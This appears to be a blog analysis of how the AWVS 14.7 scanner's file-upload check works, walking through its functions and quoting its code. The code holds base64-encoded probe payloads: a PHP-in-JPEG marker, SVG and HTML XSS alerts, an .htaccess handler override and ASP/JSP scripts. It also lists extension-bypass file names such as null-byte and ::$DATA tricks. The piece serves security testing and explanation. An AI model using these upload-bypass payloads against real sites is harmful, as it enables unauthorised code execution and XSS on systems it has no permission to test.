Analysis of File_Upload.script

startTesting().png

startTesting() -> prepareUploadURLs() = true -> end plugin running

startTesting() -> prepareUploadURLs() == false -> TestXXEFileUpload() is used to judge whether there is an alertXXE() vulnerability, and continue to run regardless of whether there is a vulnerability -> get the path ( this.scheme.path ), and the path has a suffix name, and the suffix is cgi or pl -> **TestPerlJam2() is used to judge whether there is an alertPerljam2()** vulnerability, and continue to run regardless of whether there is a vulnerability -> Continue to run

startTesting() -> prepareUploadURLs() == false -> TestXXEFileUpload() is used to judge whether there is an alertXXE() vulnerability, and continue to run regardless of whether there is a vulnerability -> the path ( this.scheme.path ) is not obtained , or the path is not There is a suffix, or the suffix is not cgi or pl -> **TestZipSymlinkUpload() is used to determine whether there is an alertZipSymlink()** vulnerability, and it will continue to run regardless of whether there is a vulnerability -> **TestImageUploadExifXSS()** is used to determine Whether there is an **alertEXIFXSS()** vulnerability, continue to run regardless of whether there is a vulnerability -> this.existFileUpload() == false -> end the plugin running

startTesting() -> prepareUploadURLs() == false -> TestXXEFileUpload() is used to judge whether there is an alertXXE() vulnerability, and continue to run regardless of whether there is a vulnerability -> the path ( this.scheme.path ) is not obtained , or the path is not There is a suffix, or the suffix is not cgi or pl -> **TestZipSymlinkUpload() is used to determine whether there is an alertZipSymlink()** vulnerability, and it will continue to run regardless of whether there is a vulnerability -> **TestImageUploadExifXSS()** is used to determine Whether there is an **alertEXIFXSS() vulnerability, continue to run regardless of whether there is a vulnerability -> this.existFileUpload() == true -> call TestFileUpload() for the first time -> this.foundOneUploadURL == true -> call TestFileUpload() in turn 19 times, each time a different file is built for long pass test, if a vulnerability is detected, call alert()** and end the plug-in operation

startTesting()

1.0 if detected as file input ( this.scheme.hasFileInput )

Then call prepareUploadURLs()

2.1 If prepareUploadURLs() returns true , then end the plug-in operation

2.2 If prepareUploadURLs() returns false , the plugin continues to run

3.0 If you call the aws s3 interface, call TestXXEFileUpload() (see the detailed description of this function for the calling method)

Regardless of whether TestXXEFileUpload() reports a hole ( alertXXE() ), the function continues to run

4.0 If the path ( this.scheme.path ) is obtained , and the path has a suffix name, and the suffix name is cgi (public network interface script) or pl (compiled and run by Perl script), call TestPerlJam2()

5.0 Call TestZipSymlinkUpload() , the calling method is this.TestZipSymlinkUpload(“SanTest” + random(maxRandomNumber) + “.zip”, “application/octet-stream”)

6.0 Call TestImageUploadExifXSS() , the calling method is this.TestImageUploadExifXSS(“SanTestEXIF” + random(maxRandomNumber) + “.jpg”, “image/jpeg”)

7.0 Call **this.existFileUpload()** to judge whether the uploaded file is visible or not, and no longer test if it is not visible

8.0调用TestFileUpload()，调用方法为this.TestFileUpload(“SanTest” + random(maxRandomNumber) + “.jpg”, “image/jpeg”, b642plain(“/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/ EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), detectURLstr)

Here the payload base64 is decoded as the following picture, with a sentence output by php

9.1 this.foundOneUploadURL == false , end the plugin running

9.2this.foundOneUploadURL == true

Call **TestFileUpload() 19 times in turn, each time constructing a different file for long-pass testing, if a vulnerability is detected, call alert()** and end the plug-in operation

if (!await this.TestFileUpload("Applet" + random(maxRandomNumber) + ".class", "image/jpeg", appletPayload, appletPayload))
                    await this.TestFileUpload("Applet" + random(maxRandomNumber) + ".jar", "image/jpeg", appletPayload, appletPayload);
                // test xss via svg
                await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".svg", "application/xml", b642plain("PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4NCjx1c2UgeGxpbms6aHJlZj0iZGF0YTphcHBsaWNhdGlvbi94bWw7YmFzZTY0LFBITjJaeUI0Yld4dWN6MGlhSFIwY0RvdkwzZDNkeTUzTXk1dmNtY3ZNakF3TUM5emRtY2lJSGh0Ykc1ek9uaHNhVzVyUFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hzYVc1cklqNE5DanhrWldaelBnMEtQR05wY21Oc1pTQnBaRDBpZEdWemRDSWdjajBpTlRBaUlHTjRQU0l4TURBaUlHTjVQU0l4TURBaUlITjBlV3hsUFNKbWFXeHNPaUFqUmpBd0lqNE5Danh6WlhRZ1lYUjBjbWxpZFhSbFRtRnRaVDBpWm1sc2JDSWdZWFIwY21saWRYUmxWSGx3WlQwaVExTlRJaUJ2Ym1KbFoybHVQU2RoYkdWeWRDZ3hLU2NnYjI1bGJtUTlKMkZzWlhKMEtESXBKeUIwYnowaUl6QXdSaUlnWW1WbmFXNDlJakZ6SWlCa2RYSTlJalZ6SWlBdlBnMEtQQzlqYVhKamJHVStEUW84TDJSbFpuTStEUW84ZFhObElIaHNhVzVyT21oeVpXWTlJaU4wWlhOMElpOCtEUW84TDNOMlp6NGcjdGVzdCIvPg0KPC9zdmc+ICAg"), '<use xlink:href="data:application/xml;base64,', 0, 'svg');
                // test xsscanonUrl
                if (!await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".htm", "text/html", b642plain("PHNjcmlwdD5hbGVydCgnc2FuZ2ZvciB4c3MgdGVzdCcpOzwvc2NyaXB0Pg=="), "<script>alert('sangfor xss test');</script>", 0, 'html'))
                    await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".htm", "image/jpeg", b642plain("PHNjcmlwdD5hbGVydCgnc2FuZ2ZvciB4c3MgdGVzdCcpOzwvc2NyaXB0Pg=="), "<script>alert('sangfor xss test');</script>", 0, 'html');
                // test shell upload
                ScriptProgress(ComputeProgress(2, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(3, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.php.rar	", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(4, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php3", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(5, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php\x00.jpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEARwBHAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAEAAQAwEiAAIRAQMRAf/EABYAAQEBAAAAAAAAAAAAAAAAAAQAAf/EACIQAAEEAgEEAwAAAAAAAAAAAAIBAwQFBhEHABITMSFBYf/EABUBAQEAAAAAAAAAAAAAAAAAAAQH/8QAIhEBAAECBAcAAAAAAAAAAAAAERIAEwMEFUEiJTJCYqGx/9oADAMBAAIRAxEAPwB1CxxdV8a01pk9Lb3OQ2kmajcaHZymyMQlutivaDqCKIIiKaT5169r1t9H4utONLm1xelt6bIauTCRyNMs5ThNi5LabJe03VEkUSIV2nxv16XovHzvH7IVFhkmT2tfMhx7CG/EYqZZkPklSDbcbeBshRex7e039fvVyA7x+63cWGN5Ra2EybHr4jEN+plgReKVHNxxx420FV7Gd7XX3+dI5vqvfC55BL5VPhlmLiXVeIZ9IAb+9q//2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(6, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".phtml", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(7, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php", "text/plain", b642plain("PD9waHAgZWNobyhtZDUoJ2FjdW5ldGl4LWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+"), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(8, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.jpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(9, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.123", "image/png", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(10, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php::$DATA", "image/png", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(11, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".htaccess", "image/jpeg", b642plain("I1Nhbmdmb3IgLmh0YWNjZXNzIEZpbGUgVXBsb2FkIHRlc3QNCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmpwZyAucG5nIC5naWYgLmh0bSAuaHRtbCA="), "# .htaccess File Upload test")) return;
                ScriptProgress(ComputeProgress(12, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".php.ajpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEARwBHAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAEAAQAwEiAAIRAQMRAf/EABYAAQEBAAAAAAAAAAAAAAAAAAQAAf/EACIQAAEEAgEEAwAAAAAAAAAAAAIBAwQFBhEHABITMSFBYf/EABUBAQEAAAAAAAAAAAAAAAAAAAQH/8QAIhEBAAECBAcAAAAAAAAAAAAAERIAEwMEFUEiJTJCYqGx/9oADAMBAAIRAxEAPwB1CxxdV8a01pk9Lb3OQ2kmajcaHZymyMQlutivaDqCKIIiKaT5169r1t9H4utONLm1xelt6bIauTCRyNMs5ThNi5LabJe03VEkUSIV2nxv16XovHzvH7IVFhkmT2tfMhx7CG/EYqZZkPklSDbcbeBshRex7e039fvVyA7x+63cWGN5Ra2EybHr4jEN+plgReKVHNxxx420FV7Gd7XX3+dI5vqvfC55BL5VPhlmLiXVeIZ9IAb+9q//2Q=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(13, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".asp", "image/jpeg", b642plain("PCUgUmVzcG9uc2UuV3JpdGUoIjRkMDIwNzBlZmZkZDdlMzE5IiArICJjYTU2MWJjNjY2MTdhOGEiKSAlPg=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(14, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".aspx", "image/png", b642plain("PHNjcmlwdCBydW5hdD0ic2VydmVyIiBsYW5ndWFnZT0iQyMiPg0Kdm9pZCBQYWdlX0xvYWQob2JqZWN0IHNlbmRlciwgRXZlbnRBcmdzIGUpew0KICBSZXNwb25zZS5Xcml0ZSgiNGQwMjA3MGVmZmRkN2UzMTkiICsgImNhNTYxYmM2NjYxN2E4YSIpOw0KfQ0KPC9zY3JpcHQ+DQo="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(15, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".asp", "text/plain", b642plain("PCUgUmVzcG9uc2UuV3JpdGUoIjRkMDIwNzBlZmZkZDdlMzE5IiArICJjYTU2MWJjNjY2MTdhOGEiKSAlPg=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(16, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".asp;.jpg", "image/jpeg", b642plain("PCUgUmVzcG9uc2UuV3JpdGUoIjRkMDIwNzBlZmZkZDdlMzE5IiArICJjYTU2MWJjNjY2MTdhOGEiKSAlPg=="), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(17, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".jsp", "image/jpeg", b642plain("PCUgb3V0LnByaW50KCI0ZDAyMDcwZWZmZGQ3ZTMxOSIgKyAiY2E1NjFiYzY2NjE3YThhIik7ICU+"), "963151c21d0fe4a98606a053e7cc9208")) return;
                ScriptProgress(ComputeProgress(18, numberTests));
                if (await this.TestFileUpload("SanTest" + random(maxRandomNumber) + ".jpg", "image/jpeg", b642plain("/9j/4AAQSkZJRgABAQEASABIAAD//gAyPD9waHAgZWNobyhtZDUoJ3Nhbmdmb3JyLWZpbGUtdXBsb2FkLXRlc3QnKSk7ID8+/9sAQwAFAwQEBAMFBAQEBQUFBgcMCAcHBwcPCwsJDBEPEhIRDxERExYcFxMUGhURERghGBodHR8fHxMXIiQiHiQcHh8e/9sAQwEFBQUHBgcOCAgOHhQRFB4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4e/8AAEQgAAQABAwEiAAIRAQMRAf/EABUAAQEAAAAAAAAAAAAAAAAAAAAI/8QAFBABAAAAAAAAAAAAAAAAAAAAAP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCywAf/2Q=="), "963151c21d0fe4a98606a053e7cc9208", 1)) return;

prepareUploadURLs()

Create an array fileInputList for all file inputs

Determine whether the input type is a file, and if so, add it to the array fileInputList

If the length of fileInputList is 0, it means that there is no file upload vulnerability and returns true

If the length of fileInputList is not 0

Then submit the array to the framework function selectVariationsForInputList for processing. The function of this function is to upload the array to the framework and declare it as array variations

Define an array of file upload vulnerability URLs (this.uploadURLs) whose number is the length of the array variations , and assign values in the array this.uploadURLs to **{TO_BE_DETECTED}**

end of operation

TestXXEFileUpload()

First create a random value rndToken with a length of 10 , and write the rndToken into a payload in xml format

Create a TList class fileInputList for all file inputs

Determine whether the input type is a file, and if so, add it to the class fileInputList

Returns true if there is no value in class fileInputList

If the array in the class fileInputList is not empty, submit the array to the framework function selectVariationsForInputList for processing. The function of this function is to upload the array to the framework and assign the value of the array in the class fileInputList to the array variations

Load the values in the array variations sequentially ( loadVariation() ),

Then use setInputFileName() , setInputContentType() , **setInputValue()** to create the file name (passed in when calling the function), file type (passed in when calling the function), and the value in the file ( payload ) (random string it's here)

Send this file with dnslog, if the response packet does not report an error or the error code is 983043 , and dnslog can monitor random numbers, then call alertXXE()

alertXXE() declares the XML_External_Entity_Injection_And_XML_Injection2.xml vulnerability. (xxe vulnerability)

startTesting() calling method:

First call **this.TestXXEFileUpload(“SanTest” + random(maxRandomNumber) + “.xml”, “text/xml”)**, if it returns false,

Then use **this.TestXXEFileUpload(“SanTest” + random(maxRandomNumber) + “.jpg”, “image/jpeg”)** to call.

Regardless of the results of the above two calls, call it again with **this.TestXSLTFileUpload(“SanTest” + random(maxRandomNumber) + “.xml”, “text/xml”)**

TestPerlJam2()

Initialize the variable fileInputName to match the input point whose input type is FILE in the input point. If it matches, exit the loop and assign it to fileInputName

Construct a packet body with fileInputName

Send a data packet with form type data in the data packet body , and call alertPerljam2() if there are some special strings (root, bin, etc.) in the response packet .

alertPerljam2() declares that there is a Directory_Traversal.xml vulnerability. (directory traversal vulnerability)

TestZipSymlinkUpload()

Create a variable payload as a string of base64 decryption results, and I don't understand the decoded content of base64. . . ? It is said on the Internet that it is a soft link that contains a reference to other files or directories in the form of an absolute path (path_(computer science)) or a relative path.

Create a TList class fileInputList for all file inputs

Determine whether the input type is a file, and if so, add it to the class fileInputList

Returns true if there is no value in class fileInputList

Load the values in the array variations sequentially ( loadVariation() ),

Then use setInputFileName() , setInputContentType() , **setInputValue()** in turn to create the file name (passed in when calling the function), file type (passed in when calling the function), and the value in the file ( payload )

Then send the package, if the response package does not report an error

First judge whether there are special strings (root, bin, etc.) in the response packet, and if so, call alertZipSymlink() and return true

If not, base64 decrypts the data of the response packet once. If the decrypted content contains special strings (root, bin, etc.), call alertZipSymlink() and return true

alertZipSymlink() declares that there is a File_Upload_ZIP_symlink.xml vulnerability. (Compressed package soft link file upload vulnerability)

TestImageUploadExifXSS()

Create a variable payload as a string of base64 decryption results. The base64 decoded content should be a picture horse, and there are many pop-up commands

Create a TList class fileInputList for all file inputs

Determine whether the input type is a file, and if so, add it to the class fileInputList

Returns true if there is no value in class fileInputList

Load the values in the array variations sequentially ( loadVariation() ),

Then send the package, if the response package does not report an error and the tag=svg|onlοad=alert(7346763) is recognized after html parsing, call alertEXIFXSS()

alertEXIFXSS() declares that there is a File_Upload_XSS.xml vulnerability. (File upload triggers XSS vulnerability)

TestFileUpload()

1.0 Create TList class fileInputList for all file input

Determine whether the input type is a file, and if so, add it to the class fileInputList

Returns true if there is no value in class fileInputList

Load the values in the array variations sequentially ( loadVariation() ),

Then send the package.

If there is " \x00.jpg " in the file name, delete his " \x00.jpg "

If the response packet does not report an error

2.1 Judge the value of **this.uploadURLs[varIndex] , if this.uploadURLs[varIndex] == {NOT_FOUND}**, exit this function directly

2.2 If this.uploadURLs[varIndex] == {TO_BE_DETECTED} or {BRUTEFORCE}

First test the previously determined file upload directory, construct url = scan path + file name

2.2.1 Call the function TestUploadedFileOnUrl() , if TestUploadedFileOnUrl() == true , define the variable this.foundOneUploadURL = true , intercept the url from the last " / " of the scanned file path , and assign it to this.uploadURLs[varIndex] , If lookFor (passed in when calling the function) = detectURLstr(sangforr-file-upload-test) , call alert() and return true to exit this function

2.2.2 Call the function TestUploadedFileOnUrl() , if TestUploadedFileOnUrl() == false , then create a class pd = getParserData(this.lastJob.response.body, this.lastJob.response.headerValue('content-type')) , if pd If .getLinks() exists and the value exists in the file name, create an array links = pd.getLinks() If the url is passed through http and there is a domain name ( baseDomain ), intercept the url from the last " / " of the scanned file path , and assign it to this.uploadURLs[varIndex] , and let this.foundOneUploadURL = true if lookFor (passed in when calling the function) = detectURLstr(sangforr-file-upload-test) , then call alert() and return true to exit this function run

2.2.3 If the judgments in 2.2.1 and 2.2.2 are not successful, then create a variable fileExt = getFileExt(filename) which is the suffix of the file name, if there is a variable fileExt and an array of links (this array was created in 3.2), create a New array newLinks = new TStringList() , if the end of a value in the array links is "." + fileExt , add a value in the array links to the array newLinks

If the length in the array newLinks is not 0, assign this length to the variable linksCount . The length of the variable linksCount cannot exceed 5. If it is greater than 5, it will be reassigned to 5. If the transmission method of the url is http and there is a domain name ( baseDomain ) , intercept the url from the last " / " of the scanned file path , and assign it to this.uploadURLs[varIndex] , and let this.foundOneUploadURL = true if lookFor (input when calling the function) = detectURLstr(sangforr-file-upload- test) call alert() and return true to exit this function

2.2.4 If the judgment in 2.2.3 is unsuccessful, change the value of the variable this.uploadURLs[varIndex] == '{TO_BE_DETECTED}' to this.uploadURLs[varIndex] = '{NOT_FOUND}'

2.3 The value of the variable this.uploadURLs[varIndex] does not belong to {NOT_FOUND} or {TO_BE_DETECTED} or {BRUTEFORCE}

If variable this.uploadURLs[varIndex] != '' , create class canonUrl

If appendPHPFilename (passed in when calling the function) == 1 then canonUrl = new TURL(this.uploadURLs[varIndex] + filename + '/sangfort.php') , otherwise canonUrl = new TURL(this.uploadURLs[varIndex] + filename)

Then call the function **TestUploadedFileOnUrl()** If the return is true, and lookFor (passed in when calling the function) = detectURLstr(sangforr-file-upload-test) , then call alert() and return true to exit this function

3.0 None of the above conditions are met, indicating that there is no file upload vulnerability, return false

TestUploadedFileOnUrl()

Send the package directly (the package information is passed in when the function is called), if there is a variable searchStr in the response packet (passed in when the function is called) and the file type is the variable expectedContentType (passed in when the function is called), return true, otherwise return false

existFileUpload()

Create a TList class fileInputList for all file inputs

Determine whether the input type is a file, and if so, add it to the class fileInputList

If the array in the class fileInputList is not empty and then submit the array to the framework function selectVariationsForInputList for processing, the function of this function is to upload the array to the framework

Then use setInputFileName, setInputContentType, and setInputValue to create the file name, file type, and value in the file from the fileInputList in turn (the random string is here)

Then send a data packet with a random string. If the response packet does not report an error or the error code is 0xF0003, and the response packet contains the previously sent random string, call alertXSLT ()

alertXSLT() statement has XSLT_injection.xml vulnerability

AWVS14.7 file upload vulnerability detection logic analysis

Analysis of File_Upload.script

startTesting()

prepareUploadURLs()

TestXXEFileUpload()

TestPerlJam2()

TestZipSymlinkUpload()

TestImageUploadExifXSS()

TestFileUpload()

TestUploadedFileOnUrl()

existFileUpload()

Guess you like